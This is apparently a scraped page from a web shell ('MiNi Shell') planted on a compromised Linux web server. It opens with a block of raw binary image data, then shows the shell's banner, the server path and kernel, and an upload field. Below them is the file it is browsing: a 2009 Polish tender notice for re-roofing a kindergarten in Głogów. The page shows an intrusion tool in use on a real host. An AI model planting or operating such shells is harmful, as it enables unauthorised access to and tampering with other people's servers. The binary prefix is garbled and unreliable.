JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/86605-N-2009.html

<p class="kh_header"><b>Głogów: Wymiana pokrycia dachu budynku Przedszkola Publicznego Nr 17 w Głogowie</b><br>
<b>Numer ogłoszenia: 86605 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Publiczne Nr 17 w Głogowie , ul. Królewska 14, 67-200 Głogów, woj. dolnośląskie, tel. 0-76 835 82 45, faks 0-76 835 82 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biuletyn.sbip.pl/pp17</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana pokrycia dachu budynku Przedszkola Publicznego Nr 17 w Głogowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót:

-	Rozebranie obecnego pokrycia dachowego ok. 1080 m2,
-	Rozebranie obróbek blacharskich ok. 305m2,
-	Uzupełnienie tynków na kominach i ściankach ok.240 m2,
-	Pokrycie dachu papą termozgrzewalną 2 x po1036m2,
-	Obróbki z blachy ocynkowanej ok. 185m2,
-	Demontaż starej i montaż nowej instalacji odgromowej ok. 407m



Szczegółowy zakres zamówienia określa   przedmiar robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.14-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 3.000 zł /słownie: trzy tysiące złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, roboty budowlane odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający za robotę podobną uzna   wykonanie pokrycia dachowego papą termozgrzewalną w jednym zadaniu w ilości co najmniej 500 m2. 
4)	Dysponują lub będą dysponować osobami  posiadającymi uprawnienia  do:
o	sieci instalacji elektrycznych 
o	robót ogólnobudowlanych
o	posiadającymi aktualne zaświadczenie o przynależności do OIIB

5)	Posiadają środki finansowe w wysokości co najmniej 80.000,00 zł lub zdolność kredytową w wysokości co najmniej 80.000,00 zł .
6)	Posiadają ubezpieczenie OC w zakresie prowadzonej działalności .
Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów na zasadzie spełnia /nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Formularz oferty - zał. Nr 1 do SIWZ.
2)	Protokół z wizji terenu objętego zamówieniem potwierdzony przez inspektora nadzoru.
3)	Kosztorys ofertowy opracowany metodą szczegółową.
4)	Harmonogram rzeczowo - finansowy robót  w układzie miesięcznym  
Uwaga !
Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny.
Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru
kalkulację własną.
5)	Dowód wniesienia  wadium.
6)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
      lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 
      miesięcy przed upływem terminu składania ofert.
Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.
7)	Wykonawcy wspólnie ubiegający się o zmówienie zobowiązani są złożyć do wniosku:
.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców,     do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu                w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
.	Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy, umowę regulującą współpracę tych wykonawców.
8)	Oświadczenie  o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp - zał.Nr 2 do SIWZ,   
9)	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
      wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
       - zgodnie z załącznikiem Nr 4 do SIWZ 
7)	 Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem 
      podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub    
      zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu  -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert.               
8)	Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność 
     personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres  
     prowadzenia działalności jest krótszy - w tym okresie - zał Nr 4 do SIWZ.
9)	Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób 
     zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby 
     którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia   
     wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
     i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu
      wykonywanych przez nich czynności -     zał. Nr 4 do SIWZ 
10)	Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć 
      podwykonawcom- zał Nr 5 do SIWZ.
11)	wykazu wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem   
      wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia    
      działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz  daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,- zał. Nr 3 do SIWZ,
12)	 Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym 
wykonawca posiada rachunek, potwierdzająca wysokość  posiadanych środków  
            finansowych w wysokości co najmniej 80.000,00 - zł.   lub   zdolność kredytową 
            wykonawcy na kwotę co najmniej 80.000,00 zł. wystawiona  nie wcześniej  niż 3 
            miesiące przed upływem terminu składania ofert,
13)	Polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
14)	Oświadczenie Wykonawcy wskazujące materiały dekarskie, które zostaną użyte do wykonania zamówienia tj. środek gruntujący, papa samowentylująca, papa wierzchniego krycia,
15)	Karty techniczne stosowanych materiałów lub inne dokumenty dopuszczające dane materiały do stosowania na obszarze Polski.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.sbip.pl/pp17.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Publiczne Nr 17
ul. Królewska 14
67-200 Głogów
pok.kierownika gospodarczego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 10:00, miejsce: Przedszkole Publiczne Nr 17
ul. Królewska 14
67-200 Głogów
pok. dyrektora i kierownika gospodarczego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com